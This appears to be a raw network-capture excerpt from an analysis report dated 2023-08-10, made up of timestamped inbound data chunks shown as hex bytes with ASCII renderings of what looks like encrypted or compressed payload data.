                                                                                                                                                                                          2023-08-10 08:17:30 UTC152INData Raw: 99 71 d3 51 7a ce a3 30 e3 bc a9 46 d9 d0 ee 21 d6 ea 5a 02 73 43 de 7d 81 7f 39 20 e0 bb 3e a8 5d d7 95 18 b2 77 76 de d2 aa 39 5a 9e ee f7 3b 84 5f 51 e4 dc 29 67 2a 52 cb 76 59 64 9c 97 85 ee 59 10 75 11 5a a2 55 2f ca 53 8d 53 a5 7f a1 a9 be d4 f8 b0 d8 71 21 8a e0 c1 5f 7a 74 04 d2 4a c4 38 0a 9d ec 0b a5 a4 d2 06 8d 52 ca 55 c1 90 50 ee 39 ad c1 fa 8e d0 8b 61 10 39 6f 97 ff a0 d1 34 f8 90 96 8f d8 5c 37 9b f7 c6 f3 c2 08 34 4b 3b 48 e7 1b d8 ce 1c 4c 91 b6 81 1b 22 83 74 b4 aa 9b c1 1d f9 28 c6 76 90 ed 28 1c f4 53 3d 34 21 e0 3a d4 fb 69 8f 68 77 7c 34 4d e9 8e 15 c4 f5 d3 33 b7 4c 7a 82 83 df 8c 33 81 85 0b 0e 04 99 7f a4 ca b3 a7 04 e0 3a d1 7b 67 44 99 5b 7a f8 cd 77 83 44 ae d7 83 8e da bf 7f 85 06 16 dd 30 68 ea 1c 7c 7a 2a c1 a9 fe 6f d4 ec
                                                                                                                                                                                          Data Ascii: qQz0F!ZsC}9 >]wv9Z;_Q)g*RvYdYuZU/SSq!_ztJ8RUP9a9o4\74K;HL"t(v(S=4!:ihw|4M3Lz3:{gD[zwD0h|z*o
                                                                                                                                                                                          2023-08-10 08:17:30 UTC153INData Raw: 81 cb 79 ec 88 8e 0a 99 56 3c 5f d7 ae f9 a4 b7 fb 53 32 ea 34 0f d9 a8 e8 cf 8a 43 33 bf af 07 63 67 87 69 90 3d f0 06 0d 59 96 97 97 03 2c 9c f1 83 7d d6 17 6b 94 fc b1 2b c7 c8 39 d3 fc ee 01 f0 4d ea c8 53 71 79 ba 1f 4d 9c b0 cb 72 66 c7 59 19 70 17 d0 9c 5c fb 3f f9 48 5b 80 6e b5 70 5d 96 d0 b3 ba 18 af 62 0e 47 c1 fd 3a 47 5c ca c1 43 62 f9 ff 18 45 b7 00 a9 58 b7 7d f3 d1 f5 bf c9 be 27 2b 6d 17 d2 f4 90 64 20 84 34 f3 3c ed 6f 3a ef 32 23 94 d0 ba 97 72 f9 3e 5d 46 16 62 71 e3 f0 7f e5 7c 68 53 7d 98 d3 7f 24 97 28 48 b0 5b 2d 09 92 68 c9 92 fd e4 4f b2 b3 cd 27 01 d5 70 4e 22 e4 fc 5a ca 22 2d 7d f5 c3 b1 72 87 77 a1 79 a1 11 a4 0f c6 86 67 1c ee 52 fa 6e 2c c0 55 2e 29 c1 32 60 fb e2 6d 59 56 df fd 25 d9 88 45 28 4a f0 4a 5a 6e 40 3f 8c 2e 12
                                                                                                                                                                                          Data Ascii: yV<_S24C3cgi=Y,}k+9MSqyMrfYp\?H[np]bG:G\CbEX}'+md 4<o:2#r>]Fbq|hS}$(H[-hO'pN"Z"-}rwygRn,U.)2`mYV%E(JJZn@?.
                                                                                                                                                                                          2023-08-10 08:17:30 UTC154INData Raw: a5 41 61 8e 95 01 d3 07 05 72 5b 8d 6e 4a c4 5a d5 f9 77 98 cd 06 c5 b9 ea 0f 92 29 df 0e 92 33 b6 0d 79 3a 5f 24 a0 77 70 6c 8f 26 8d fb 6c 1a 08 d3 5e e7 99 d2 d3 ea 0c 3f 37 54 7e e0 eb ba 22 ca c1 c7 15 3b f2 eb f3 35 53 c8 74 be 9a f6 bb e3 89 da 8f 0e 7d b6 88 50 e9 ca d7 36 c8 65 b9 5f f1 41 9b 02 00 96 fa 82 2c 25 07 01 1f 17 59 fc 3e 7c 8a 13 89 3e 0c 1a 36 e8 18 e7 8d af 1b ab 80 0d d0 bf 23 1d 06 6d e4 1c 7c a0 10 1c e5 54 e0 06 37 fc 19 3b 6e 9c d2 33 b3 db b8 a3 dc 0b c1 3a 1b 00 b5 c5 6c 64 1d d8 da 8f 61 ff 12 59 3a 12 4b c0 d5 98 f9 b4 97 d6 9c c8 89 5f 27 79 81 c3 a4 2c f9 ae 02 f9 86 bd 6e c1 1e 3c a8 d6 aa 35 df 9e d5 15 1a 70 78 68 67 b6 17 ca 40 1d 41 fb e8 5f ed 78 e3 44 22 4b 6a f2 2e 5d ac b0 3a ec 9d d7 fd 98 1f 5f f8 1c ba 14 1f
                                                                                                                                                                                          Data Ascii: Aar[nJZw)3y:_$wpl&l^?7T~";5St}P6e_A,%Y>|>6#m|T7;n3:ldaY:K_'y,n<5pxhg@A_xD"Kj.]:_
                                                                                                                                                                                          2023-08-10 08:17:30 UTC155INData Raw: 37 96 49 79 f9 01 d1 0e 5a d4 1e 87 70 39 d0 db 84 32 dc 09 4c 33 a7 c3 65 84 e5 48 2f 09 ad 57 6c 54 cf 60 f0 75 00 89 54 dd 5c 42 18 c0 59 8a 13 0a f4 96 4e 4b 6f 4a e6 4d e0 f6 b3 27 db 52 cd a0 42 27 c0 bb 1c 67 bd 67 85 0c 4b fc 52 18 f9 92 8f 30 54 e5 d9 cd 62 9b d5 b5 10 36 37 f3 d8 ee 31 7d c1 59 2e 76 22 cb 22 28 c8 f8 01 b8 8b 22 3a b4 72 68 ac fd 5a 07 42 1f 5b 91 3b c7 31 e8 b7 0f 38 92 51 23 21 db 3d 0f f6 37 ce 81 76 93 fe fa 1a cd 36 df 51 1f 99 df 22 87 69 18 7a 71 ed df 21 5b 00 97 e7 2e cd 17 7d 40 6e ad 37 46 71 a7 5c 15 e5 dd e7 65 20 11 b5 7d 6e c9 01 e9 5e ca d9 f1 fb 93 0c 99 ab 33 27 ba e7 13 13 97 29 c4 e2 36 37 e8 5a aa 23 92 9b 2f 7d c0 b0 62 f6 42 01 2c 71 3e b2 f1 82 35 80 a6 8a ea ca 53 9c d0 b9 9e 7e e6 54 a1 9b 2d 0c 28 b4
                                                                                                                                                                                          Data Ascii: 7IyZp92L3eH/WlT`uT\BYNKoJM'RB'ggKR0Tb671}Y.v""(":rhZB[;18Q#!=7v6Q"izq![.}@n7Fq\e }n^3')67Z#/}bB,q>5S~T-(
                                                                                                                                                                                          2023-08-10 08:17:30 UTC157INData Raw: d5 a1 c2 ac 34 22 f2 3b fc c0 79 25 96 42 a2 8a e9 f9 80 59 1b 85 eb c8 7b 32 48 85 a7 86 c5 a2 f7 fb 72 06 29 f6 14 36 88 70 b0 af 35 b0 25 fe 6b f9 16 4b fe 3e 49 18 26 86 36 04 25 a3 c6 fa e5 e6 a6 77 5a 31 5d b2 c1 b5 8e 2d d2 16 4a 9e c3 4a 51 3e 75 09 37 ee ed 1a 09 39 a9 d6 7c fe ba 56 ff 7d 2d 07 02 fb da a9 35 9b d0 cc 9f 56 7b f1 f0 66 a1 50 8b 22 c0 d4 0e 86 84 ea cf 09 78 ff 80 d3 20 63 bb 03 91 dc 2a 8a 11 c6 93 4f 0a b9 fb f3 93 22 09 ae 14 a5 c0 7e 85 ad 31 8d 36 67 b0 8d 46 2b 43 2c b9 d3 84 4c 8e 6b b5 e9 5a 09 64 8c 2d e1 10 8f c6 1f e5 c8 61 ca 24 ca cd 24 93 ec 31 e7 be 95 69 59 64 ce 87 79 b2 2e 71 8d 6c 16 fc a6 a2 d5 ea 72 95 9d 8a d9 a2 d8 8b f7 56 26 8e 93 81 c4 6e 50 6a c3 e2 d5 66 19 bf bc 7d cf 42 1b 8c 94 ff d2 74 bc 9b 53 06
                                                                                                                                                                                          Data Ascii: 4";y%BY{2Hr)6p5%kK>I&6%wZ1]-JJQ>u79|V}-5V{fP"x c*O"~16gF+C,LkZd-a$$1iYdy.qlrV&nPjf}BtS
                                                                                                                                                                                          2023-08-10 08:17:30 UTC158INData Raw: 33 c7 5c 6c ef a0 c2 2b 91 f7 1e 37 93 05 c8 13 26 78 2f 9f a8 07 61 9b 62 b1 fc 4c 23 90 40 ce c4 7f 86 d8 57 d8 14 2b 04 49 1d 70 32 a3 d1 a7 05 a0 00 bd 95 06 42 c7 8e a6 a0 12 ec 84 e2 90 f5 2a 77 7a 7f d5 aa 70 5e b2 4e a7 7f 09 5b d4 33 38 03 06 de 24 db 0c eb d9 8a 51 9f 90 1e aa 2c 27 42 96 34 d8 2f aa 48 84 32 2f f6 25 9c 63 5c 6e e6 48 69 9d 92 be 30 01 eb 44 53 23 a7 e9 6e db 01 a9 1b e9 38 9e 9e 2b 7d b5 37 4d 0f e6 06 c2 5d c2 ef 07 31 d7 27 e2 e3 1b 77 ee 62 77 a1 c8 b2 c6 5e 29 21 10 bc 58 ce 1a f8 29 ac 03 9a 49 e7 83 c0 64 5f 42 3d 49 5f f4 a8 83 a6 9a 5e 13 9f d2 fa b6 ed b8 d3 10 98 57 1a a9 c4 67 f7 33 f6 a2 95 cf 48 ac 50 ad f7 a2 cd e9 2e 32 34 e6 1b 41 93 c9 0e 43 2b 91 e3 78 fd 48 db 01 17 c5 0e 25 a0 46 90 d8 37 85 0c 1c 0d 09 f5
                                                                                                                                                                                          Data Ascii: 3\l+7&x/abL#@W+Ip2B*wzp^N[38$Q,'B4/H2/%c\nHi0DS#n8+}7M]1'wbw^)!X)Id_B=I_^Wg3HP.24AC+xH%F7
                                                                                                                                                                                          2023-08-10 08:17:30 UTC159INData Raw: 6d 94 a1 53 03 bf a2 eb 2d 2a 6a a6 c1 b2 d9 c2 4d ca ed fc 61 eb 2d 6d a9 71 b2 9f f7 72 a2 a8 2c b4 21 22 f9 a8 f7 02 ed 8f bd 8e 83 77 d8 10 11 9d fd 67 3e 95 90 3b f1 af b3 15 64 e8 a0 2c ef 65 42 04 0a d1 e0 6c 28 78 e8 b7 36 73 d1 c2 96 ba ca 38 75 c7 2c a2 21 30 eb 9f 1f 65 33 62 a5 47 b0 36 6c f8 dc 34 93 f5 a8 5e 72 58 de 5c b6 85 3a ef 08 07 e2 41 60 e2 9a b8 95 ff 89 7e ee 3c cf 3c 79 4c 8a 37 03 27 b7 ce a5 45 08 ee f6 19 68 eb 84 7d 72 51 43 27 02 bf 55 e8 67 be ff fd 33 12 27 65 70 82 6f 95 be ec 90 7c 67 09 ed 76 11 a5 56 42 a2 6e 58 b2 62 c5 3c 53 bb 53 af a7 20 e4 38 19 7a cf d3 a1 3c 90 be 6d cb 73 64 ae 9d a7 7e df df 96 71 3d 6e 1f e9 1d fa 34 2a cd b1 86 47 03 95 f5 24 63 4e 2b 1b cc 9e df 9e 6e 78 4d 8d f2 09 2e d8 b9 80 a0 a6 d5 4f
                                                                                                                                                                                          Data Ascii: mS-*jMa-mqr,!"wg>;d,eBl(x6s8u,!0e3bG6l4^rX\:A`~<<yL7'Eh}rQC'Ug3'epo|gvVBnXb<SS 8z<msd~q=n4*G$cN+nxM.O
                                                                                                                                                                                          2023-08-10 08:17:30 UTC160INData Raw: 9d 2f 4b 4d 52 1a d9 ec 1a b4 c8 37 0a 12 34 dd 60 d9 c4 f2 3c c1 f6 26 77 0d 1e 3f 5b 25 a9 d2 65 35 aa f4 4c 85 da 18 1f 33 b4 c5 d6 d7 71 40 aa 0c 48 0e b6 0c e7 3c 3e 0b ac b3 9d 26 17 65 54 84 fd cc 86 e5 6e 83 80 6d 16 95 1c 9f 52 13 5c d4 28 79 a6 8b d7 f6 50 d1 e0 d6 a4 75 00 c8 9d e2 33 78 9e 5a bc e3 2c 95 fc 19 ea 40 0c f3 db 21 0a 71 a8 73 36 bd b9 66 04 3f 86 70 fb af 75 84 38 5a 17 8f a9 71 ca 36 20 52 5c ad 2b 59 0b f1 4e 68 6a a8 de 9e f9 57 eb 26 52 0d c8 e1 c8 ad 17 34 c4 9a f2 8c e6 b7 3e ea 35 68 4d 61 b2 20 22 ed 93 15 5e 7e 60 b1 8f fb a9 23 16 e5 5d b5 62 01 9b e6 0e 82 77 14 06 f7 51 66 bb dd 91 31 57 bb 91 d1 3c 10 32 73 89 4f 60 29 81 f8 74 f5 bd c8 97 5f a6 ef 5e 96 53 30 48 b1 33 56 1a 05 d2 3e b8 b1 70 22 c6 15 5e d9 10 fd 3b
                                                                                                                                                                                          Data Ascii: /KMR74`<&w?[%e5L3q@H<>&eTnmR\(yPu3xZ,@!qs6f?pu8Zq6 R\+YNhjW&R4>5hMa "^~`#]bwQf1W<2sO`)t_^S0H3V>p"^;
                                                                                                                                                                                          2023-08-10 08:17:30 UTC161INData Raw: db 54 11 db eb 08 9e 67 1a 32 54 b5 b1 d8 22 d5 e0 d2 a4 ae 80 ad 99 fb ca b0 fa 15 9c a0 ff ce b2 6b 49 ac 9f 27 93 83 d5 59 43 22 90 90 8a d8 c9 e2 74 63 96 a9 ca ed f8 cb e4 19 8d 1f 9b 7a 67 2f 63 ec a4 76 01 8c 41 2e ac 21 ac f6 94 d3 18 d2 10 27 bf 42 88 c2 a1 76 b7 8e 06 62 df bd 03 b4 7e ec a3 c4 d8 6c d1 87 ea 3a
                                                                                                                                                                                          Data Ascii: Tg2T"kI'YC"tczg/cvA.!'Bvb~l:
                                                                                                                                                                                          2023-08-10 08:17:30 UTC162INData Raw: d8 4a 07 4f 9c be c6 c7 64 e3 69 59 fb 41 bf b2 fe dc e0 0a fc 16 b7 7c 4f 83 4c 77 01 cc 3f 9e 1c 3a f1 c3 9e 29 1b 75 fe 3d cd c0 47 63 e8 15 98 9e de f8 41 47 28 53 b6 44 a8 2f 0c ad 18 9d 78 b4 50 8a 45 a4 f9 f2 9c fa 37 37 30 09 3e fd 4b 81 0e 86 32 1c cc 9f 42 84 b5 54 fa 37 34 82 6b dc 01 b6 1e 7c 35 f3 34 8c 43 76 15 dc 9a c3 20 74 5d 2d 30 73 3b 3c 83 53 9c 75 29 5f 99 21 f2 79 16 23 34 73 14 d3 95 b0 b1 d9 f8 f8 e1 bc 15 88 02 5a 35 05 e1 aa 21 f7 4d d0 19 a9 7c ad a6 2d 80 1e 29 fd 95 f0 d2 72 b2 f7 c3 7b 83 21 b4 2c 62 3e 05 f2 61 e8 e8 ee 53 d5 76 8b 31 77 1a 56 78 7a 51 8b 36 6d d3 c6 fa 98 5c 3e 1c 3e 6b 7f 40 52 c2 be a4 d3 ba 51 76 a0 29 5a 1b 67 70 f1 e1 41 f0 68 ef 43 6b d8 02 8c fc 34 5e 31 bc cd 92 c8 b1 eb 59 1e fa 25 91 7a 3c f7 78
                                                                                                                                                                                          Data Ascii: JOdiYA|OLw?:)u=GcAG(SD/xPE770>K2BT74k|54Cv t]-0s;<Su)_!y#4sZ5!M|-)r{!,b>aSv1wVxzQ6m\>>k@RQv)ZgpAhCk4^1Y%z<x
                                                                                                                                                                                          2023-08-10 08:17:30 UTC163INData Raw: a1 ea 12 00 a2 38 53 93 cb a1 78 1d c3 08 24 d8 47 66 7d 6e 82 6e ea 2e a1 8d de 49 44 d3 f8 0d ef 4e bc af 5b db b4 47 3b 2b ad ed b2 83 27 a7 d6 f3 da 9d 44 e1 7d 9f 55 96 33 ba 75 e8 5a 2f 1d 31 5f c9 a3 dc 11 10 ca 95 c0 1f 45 5d af 89 53 7e 28 84 85 fa 69 31 e5 5d 0e 5f 81 4c 2a 08 f8 f4 db 37 39 30 9b 76 9c f5 b7 7f 42 74 a2 fe 21 05 13 fb c6 48 e6 2e 8c b5 8a 7a c0 95 dc e6 8b 8f 65 69 b9 cf 86 78 c7 d2 72 f1 83 f6 d3 5a ca 98 43 ba 89 14 b1 0e c6 0a 9f ea 28 ad 2b cb f9 34 cd 46 e4 71 cf c0 d7 b6 47 21 5c 16 b0 05 1f 9e 00 78 03 15 e1 9a 91 39 ec 2a c7 b0 3f fa ba 32 5f 0a 01 a4 43 b4 5e d9 99 9d ff a9 e6 3d 86 e3 c2 55 eb d9 02 04 d6 0e e4 d4 33 3f a3 31 91 9c bb 05 3e 49 64 6a 32 67 7d 76 2b a5 e8 50 45 50 83 21 8e 71 34 94 0a 75 2e 0f f9 fc eb
                                                                                                                                                                                          Data Ascii: 8Sx$Gf}nn.IDN[G;+'D}U3uZ/1_E]S~(i1]_L*790vBt!H.zeixrZC(+4FqG!\x9*?2_C^=U3?1>Idj2g}v+PEP!q4u.
                                                                                                                                                                                          2023-08-10 08:17:30 UTC164INData Raw: 6c 93 f9 65 b6 a4 be 68 38 b8 2c 67 45 20 b3 e6 03 eb 5f 01 f2 e1 d3 50 83 23 8d 47 fe b0 72 6c e5 a3 89 3e 67 24 5d ee 37 8f 7f ee 41 ba 13 ed 66 9b 73 bc 8f 76 4d 6b 28 ba a0 2c 36 b0 5f 3e 06 3b eb c3 83 62 79 70 66 10 15 26 da b1 c2 e3 19 fd 09 f1 2b 2c cc 44 85 84 da 70 74 b7 6b 6f 57 48 4c b9 d8 8f c5 29 1d 81 78 34 0c ca a7 8d 0e fb cb b3 ba 12 71 f3 48 52 f1 34 08 38 cd ce 84 d0 a2 d4 e4 ea 95 05 d7 b3 17 ad 80 4e 88 1a 61 1f 11 b1 56 e4 0b 96 0a 82 35 11 32 40 cf 39 f3 4a 88 10 bd 57 0d c7 27 44 d0 8b a9 71 6e 7d 3e b5 cc 24 10 94 e5 07 93 43 c8 bf 40 e8 3f 59 7d de d6 79 0e ce 43 5b 12 30 ed ab 0b de 9a 4e 42 a9 8e 3e 63 86 38 7f 9c 05 a9 f9 02 96 4e b0 21 93 ee c9 57 48 ff c8 e9 89 5b e0 77 8b 75 36 60 5c 15 83 5c d1 e1 23 2e a6 da 6b 18 9c 6c
                                                                                                                                                                                          Data Ascii: leh8,gE _P#Grl>g$]7AfsvMk(,6_>;bypf&+,DptkoWHL)x4qHR48NaV52@9JW'Dqn}>$C@?Y}yC[0NB>c8N!WH[wu6`\\#.kl
                                                                                                                                                                                          2023-08-10 08:17:30 UTC165INData Raw: 1e ff ef fc 25 3e 69 6a f4 91 ad ff 50 b0 de d6 9e 72 43 36 53 34 02 f6 74 59 dd 38 54 06 bd e3 11 7f 9f 71 61 7f 7c da d3 12 74 fb 1c 63 aa 4e 48 83 b0 cb 8e 00 be a7 9a 67 5c 91 ea ac 7e 9c 73 01 ce a3 07 62 fe 57 9a 69 1b f0 aa 18 88 de cc 24 70 79 f9 2a 83 85 6e 62 f6 71 ca b7 34 7b 58 c9 5a 47 d2 9a 93 fc 0a ab 16 23 1b 56 7e 8e 53 62 a9 54 6a b0 76 c4 d9 14 1f 9b a0 77 22 90 8d 7c 8a be 58 ba 9f 88 01 3c 05 89 03 74 a9 2b d0 52 66 e4 f6 1f be 14 0a 07 31 25 8e 86 a3 d9 99 83 80 a3 bd e7 65 31 dd c5 ec e7 95 51 12 c5 78 ca 37 41 66 57 e7 95 e9 b3 00 a2 ee 97 6b 54 db a2 bf 3a bb ba 01 fb c0 60 9c 09 4d ad 31 2d ea b8 6c ff 07 b0 30 7b 05 40 3d 95 3f 7b 87 6d b3 ea d6 ac 20 c1 e2 79 e8 17 ec 15 2d e1 e6 84 55 95 78 70 5d 34 22 19 dc a0 74 b3 65 8b a9
                                                                                                                                                                                          Data Ascii: %>ijPrC6S4tY8Tqa|tcNHg\~sbWi$py*nbq4{XZG#V~SbTjvw"|X<t+Rf1%e1Qx7AfWkT:`M1-l0{@=?{m y-Uxp]4"te
                                                                                                                                                                                          2023-08-10 08:17:30 UTC166INData Raw: 3b b5 70 d2 97 b5 49 35 8a 89 0d 4e 38 a0 49 f6 f1 ab 5e bd d5 d7 55 6b 02 fa 7f 2a 78 8e 5d 68 d1 38 1b fd 05 df 44 40 2a 20 b0 b2 76 08 53 06 a9 fb 35 32 81 c1 17 99 8c d3 5d 15 95 92 92 b7 6f fa 0e 69 17 f8 17 62 74 ac 52 b0 9c e2 78 f3 74 dd cf 4c f1 ea cc 56 7a 2d c0 4a 09 ec 0a c2 5b dc f6 72 e5 bc 2a 42 c7 a7 be fb eb 1c 2e 2a e0 bc 77 5f eb e2 87 3d f3 f9 4c fb 47 d9 4e 7f 05 b6 03 f0 6d 61 67 23 a5 62 71 e9 f2 13 38 68 8d a8 ac 2d 76 b6 68 9b 8e 62 97 c0 e8 97 af 04 f8 21 1f 07 5e ad 22 4a a3 be af c9 37 c9 e1 d9 77 ec 27 28 3a 7f 95 1e 46 b0 4d 51 56 25 42 0e d9 a2 ce 80 cc 76 32 21 ce ce e2 de 26 77 ac 09 df c2 2f 8a 78 8d d2 7d 9b fc c2 47 e0 bd 17 30 56 e8 6f f1 55 aa 58 55 e6 5e d0 9a de 49 6d c1 2d 79 41 15 a0 9c 1a e5 ec 5d 81 a3 32 fc d4
                                                                                                                                                                                          Data Ascii: ;pI5N8I^Uk*x]h8D@* vS52]oibtRxtLVz-J[r*B.*w_=LGNmag#bq8h-vhb!^"J7w'(:FMQV%Bv2!&w/x}G0VoUXU^Im-yA]2
                                                                                                                                                                                          2023-08-10 08:17:30 UTC168INData Raw: 5f c5 cd b9 2a 8e 6f ba 97 26 ba ff 44 61 ac 71 a0 80 99 05 e2 08 17 5d 00 7e 81 d6 df 4f 81 cb 5c 26 26 d9 21 a9 4c 13 ad 2c 22 3c 8d c0 f7 36 e3 42 3b 04 99 fa 8c d2 ce 10 59 e9 f2 cd 7d fe 5c d6 a7 c0 01 dc 73 d9 54 04 6f c8 68 0e f2 79 1d 97 38 65 6d 92 e3 f9 b7 34 5b 9d 10 28 33 36 a1 a8 28 8e 13 da 5e 5d 94 ac 41 ff 08 95 5f d2 1a cf a7 f2 a1 32 92 aa 68 65 ed 3f 8e 31 60 d0 3c 72 15 f4 b2 a9 78 1c b4 9b 86 a4 53 a5 6f 21 7a fc 80 b2 f9 46 42 9b 36 b6 e9 6c 16 13 60 27 7a f2 bb 1c 71 f3 d1 b7 56 e2 96 92 dc ee 2d c3 42 07 70 12 29 cd 50 39 40 5e 7e 71 e7 67 84 8e 1f ba 5a 46 e8 19 36 33 37 cb 10 d9 ee df 5c a0 25 de 57 7c 7e 0f 0f b7 08 f6 b3 c5 14 d6 3e 64 30 ed 9b 56 63 3c c2 fa e2 2e b8 eb 31 30 21 ab a2 3a e0 33 89 fc 88 4d 17 4d ee 46 74 80 11
                                                                                                                                                                                          Data Ascii: _*o&Daq]~O\&&!L,"<6B;Y}\sTohy8em4[(36(^]A_2he?1`<rxSo!zFB6l`'zqV-Bp)P9@^~qgZF637\%W|~>d0Vc<.10!:3MMFt
                                                                                                                                                                                          2023-08-10 08:17:30 UTC169INData Raw: 90 6c 2b f9 c4 69 6e eb 0e 5a 17 4d de 11 f3 3b 9c 4e d2 0c 90 ea 27 a3 a9 ba fc e2 0a bc 45 71 37 b9 bc 42 b0 aa 43 7c 90 25 34 eb 54 a3 10 b2 cc 72 e3 a2 af c6 bd 20 49 a9 d5 e1 d9 3a fe bb b0 4b ce 11 35 9a 47 a7 25 2e 2f 01 34 3e 11 13 9c cb 28 ad b1 12 34 ac 31 77 f7 10 df 31 10 ce 64 ec d5 eb b3 cf 1c 2e a0 1b 11 76 c5 bb 80 07 4c ce 0d 2c fe cd 31 ea e3 8b 46 de d9 76 49 f3 62 93 76 07 05 4c 5f 76 bf d8 1f 6f 16 a6 56 e9 e5 fa 91 cc 79 57 24 aa a4 a6 88 79 80 e5 46 5f b5 c9 69 37 cb 41 c3 2d bb ad 95 98 76 5d 08 03 fb 57 1f 28 b2 5a a5 43 37 5b ec 28 64 d4 b8 78 3d 1c 15 59 46 98 8a 3d 4a 3f 21 25 01 4d 50 17 39 04 9e bc 69 f4 e8 6f 69 53 7f 1d f7 4b 27 95 98 51 81 ee a5 a5 1d 87 93 e4 b5 74 aa 54 1b bb 48 53 a5 c8 19 9c 9e f3 1f 6b 85 95 3d c6 05
                                                                                                                                                                                          Data Ascii: l+inZM;N'Eq7BC|%4Tr I:K5G%./4>(41w1d.vL,1FvIbvL_voVyW$yF_i7A-v]W(ZC7[(dx=YF=J?!%MP9ioiSK'QtTHSk=
                                                                                                                                                                                          2023-08-10 08:17:30 UTC170INData Raw: 82 b6 32 68 e4 a2 86 91 11 f4 02 db 12 75 fb d5 fd e8 b9 e2 cf 00 33 21 78 ff eb f3 b7 74 a7 bb bb 17 a3 63 2a 35 0d a2 a2 24 b9 1d cc 52 9d b8 52 f7 c7 88 5d 0f 24 ce e5 7f df fa 41 b4 1e b6 59 df 31 d7 e0 58 00 d4 75 31 17 d5 41 74 35 ed 47 a3 81 a8 19 a3 35 eb 39 4d a4 00 82 e8 57 7c 46 d2 7c 2c 01 e7 ff 87 55 e9 61 b2 df f8 5d 01 54 3c 1b 9a 24 25 c5 0d 9c 91 f9 f9 ac 81 a3 2e c1 b9 d2 60 ee 59 22 64 a1 50 06 e1 47 ea 59 74 bf 0a 86 65 3a 1f 89 42 a5 14 e1 b2 2d 5c cc 0a 76 17 b6 ed eb 7f 88 0f 5a 96 b9 d8 0d 4a 4c d7 3a c6 8d bd 00 e5 75 31 79 ca 78 2d a7 df 57 78 6f 83 4f 7f fa f2 0d ac 9c 5f f5 8c d9 8e 66 33 6d fe f8 cf 1e 09 37 4e f9 99 cf b0 ac c1 58 60 b7 25 e4 fd 22 6f 1e 0b b0 89 a8 e1 0f 19 15 37 c3 4a 1f cc 8e 5a e3 4e 63 2e 6d 5f 14 d2 cb
                                                                                                                                                                                          Data Ascii: 2hu3!xtc*5$RR]$AY1Xu1At5G59MW|F|,Ua]T<$%.`Y"dPGYte:B-\vZJL:u1yx-WxoO_f3m7NX`%"o7JZNc.m_
                                                                                                                                                                                          2023-08-10 08:17:30 UTC171INData Raw: b9 37 37 32 42 3e a0 73 17 02 25 52 16 14 06 27 af c7 28 4e df 78 d7 7f 61 23 37 2d ca 3b 74 f5 a6 c5 5c 46 4e 5d bb b3 8c 89 13 79 0f 48 1a e7 73 6c e4 3f 05 aa 63 ef 4e 12 d5 3d af 13 42 df 77 ca 86 80 83 0e eb 80 0c 37 91 78 f3 99 0e 94 63 d4 4a cc 6d 8b 3f d6 ab 40 2d f3 ff 57 67 09 13 3b 12 f3 ca 2e da 1d a6 97 da c6 5d 8b 05 9c 79 23 af 16 71 be 60 bd 62 ac 06 c0 50 f9 cf 1d 1f 8f 1b d0 6b 7e 7f 5e 0a 24 c5 d7 70 9b e1 18 97 ee 40 49 d0 82 87 57 15 2d 70 cb 1a f1 94 3b 70 f8 47 4c 6c 98 6a e8 31 b1 e1 ff 3e f7 63 38 d8 76 2c 7c 5f 37 49 7c af 6e 31 c1 54 45 d4 1e 24 3b 51 9a b2 70 bb bd 6b 69 84 65 77 fd c0 b0 9b 8c 60 7c e2 67 7e 37 53 81 1b 66 f7 72 be ac 4a a0 e7 dc f1 6a 9f ad 69 ef 12 fc 5c 34 9c 2e 17 51 e3 cd 01 4c 37 a6 2e a0 0a 56 71 8b 0c
                                                                                                                                                                                          Data Ascii: 772B>s%R'(Nxa#7-;t\FN]yHsl?cN=Bw7xcJm?@-Wg;.]y#q`bPk~^$p@IW-p;pGLlj1>c8v,|_7I|n1TE$;Qpkiew`|g~7SfrJji\4.QL7.Vq
                                                                                                                                                                                          2023-08-10 08:17:30 UTC173INData Raw: 11 9d de 3d 8f f8 7b 87 8c 83 dd 3e 9e a5 4c 9e 6f 5b cf ee ae a2 ab 0d f3 12 23 c3 9e 09 f0 f8 66 62 39 a8 ea ca 31 98 07 da 97 9b 6e d4 e9 3b 9b 17 2a e0 b0 95 f2 97 6f 33 d0 86 bb 0d 2a 62 68 3e 49 3e 94 2e 45 85 c1 ac 42 7e ba 84 e1 e6 15 69 f5 9a 84 08 f9 44 17 14 ae b1 94 96 3e a2 29 84 46 fe 97 23 72 b2 4a f6 5c 28 26 cd 3a 31 9d a7 8e 59 8e d9 93 da f9 a4 1a 72 59 6b ed 28 7d 65 8f 59 a8 95 02 79 6e 5a 1b 7a 76 80 10 9b 81 e7 b2 f1 db 64 60 cc 83 51 06 85 da 40 bc 98 48 91 d7 e9 64 a8 da f9 eb 1c 87 bb 41 b1 9e 95 c9 d7 ff 98 df bd a1 1e 35 ed a4 d3 35 6e 80 71 be 14 6d cc fe 28 02 03 97 0e 20 02 7d f6 40 bf 07 36 84 31 9a 97 fa d0 99 c1 54 48 f9 3c 38 2a 69 4c 71 24 e6 1e 65 9e 23 f6 b1 39 94 91 56 49 0f 8f bd 23 f9 5a f5 3d b5 6b ae c1 cb e0 0e
                                                                                                                                                                                          Data Ascii: ={>Lo[#fb91n;*o3*bh>I>.EB~iD>)F#rJ\(&:1YrYk(}eYynZzvd`Q@HdA55nqm( }@61TH<8*iLq$e#9VI#Z=k
                                                                                                                                                                                          2023-08-10 08:17:30 UTC174INData Raw: 6b 4d 62 f8 2c 77 aa 39 47 b3 01 0a bc f9 e9 ef 8d 34 65 d5 f5 70 28 d0 55 d2 60 de 41 5d 97 25 20 10 00 f3 59 ed 3d 59 86 5c fa 5c 73 ce a5 d2 c4 72 86 fe 90 bf ca c4 80 d2 81 8d af cc 38 1b 14 28 b8 6c 99 1e 35 30 fc 12 6d a5 8e 74 53 96 93 24 01 e4 d4 8c 0b bc 20 7c bc 37 94 a4 78 f0 eb a4 05 f3 e8 a9 01 88 4c c4 4a a6 1f 8e 15 db fd 71 5b f9 6d 06 e3 4c e7 ce 61 a7 d1 74 80 6d 29 82 cf 4e e8 d1 68 76 9a 2b 55 f9 d0 e1 3a 34 cf a6 ae 0f 19 98 a2 5d 41 1d 1c 8c 50 81 b3 e5 a1 6d c3 f4 20 68 7d 53 0f b5 1e 15 47 42 e3 3d 2a cf 7b 3a c3 13 94 20 ea 5e 4a 9c 09 6e 44 54 1d 07 2c 9a 54 63 a6 8c 50 1a 55 4b 52 d7 ca 26 63 c7 54 45 1b 7e 01 c8 ef 21 b8 16 17 b2 86 e6 0f d3 78 97 e0 02 c1 5c f8 f4 bf ee a3 0f c7 21 d0 5d 75 24 83 6b a5 d8 a9 01 8b 52 b2 0b 8f
